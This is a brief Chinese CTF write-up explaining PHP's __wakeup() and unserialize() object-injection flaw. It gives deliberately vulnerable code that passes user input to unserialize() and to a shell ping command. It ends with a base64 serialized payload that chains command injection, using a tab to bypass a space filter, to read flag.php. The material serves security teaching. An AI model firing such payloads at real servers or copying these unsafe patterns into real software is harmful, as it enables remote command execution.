- 简介
__wakeup(),执行unserialize()时,先会调用这个函数。
<?php
class c1
{
private $argv;
private $method;
function __construct($argv,$method)
{
$this->argv=$argv;
$this->method=$method;
}
public function f1()
{
echo "f1";
}
function __wakeup()
{
$this->f1();
}
}
$c1= new c1('123','GET');
$b = serialize($c1);
echo $b;
$str= $_GET['str'];
unserialize($str);
2.CTF考题
index.php 读取目录flag.php
<?php
class home{
private $method;
private $args;
function __construct($method, $args) {
$this->method = $method;
$this->args = $args;
}
function __destruct(){
if (in_array($this->method, array("ping"))) {
call_user_func_array(array($this, $this->method), $this->args);
}
}
function ping($host){
system("ping -c 2 $host");
}
function waf($str){
$str=str_replace(' ','',$str);
return $str;
}
function __wakeup(){
foreach($this->args as $k => $v) {
$this->args[$k] = $this->waf(trim(addslashes($v)));
}
}
}
$a=@$_GET['a'];
unserialize(base64_decode($a));
解题思路
unserialize 反序列化的时候会优先调用__wakeup() 进行空格过滤 $this->waf 调用waf函数把空格过滤是空。
首先构造序列化 base64
Tzo0OiJob21lIjoyOntzOjEyOiIAaG9tZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGhvbWUAYXJncyI7YToxOntpOjA7czo2NzoiMTI3LjAuMC4xfHR5cGUJRDpccGhwc3R1ZHlfcHJvXFdXV1x3d3cudGVzdDEuY29tXGN0ZlxkZW1vNVxmbGFnLnBocCI7fX0=
![[附源码]Python计算机毕业设计Django时间管理软件app](https://img-blog.csdnimg.cn/1102e85e59e34721b863175f794ac78b.png)
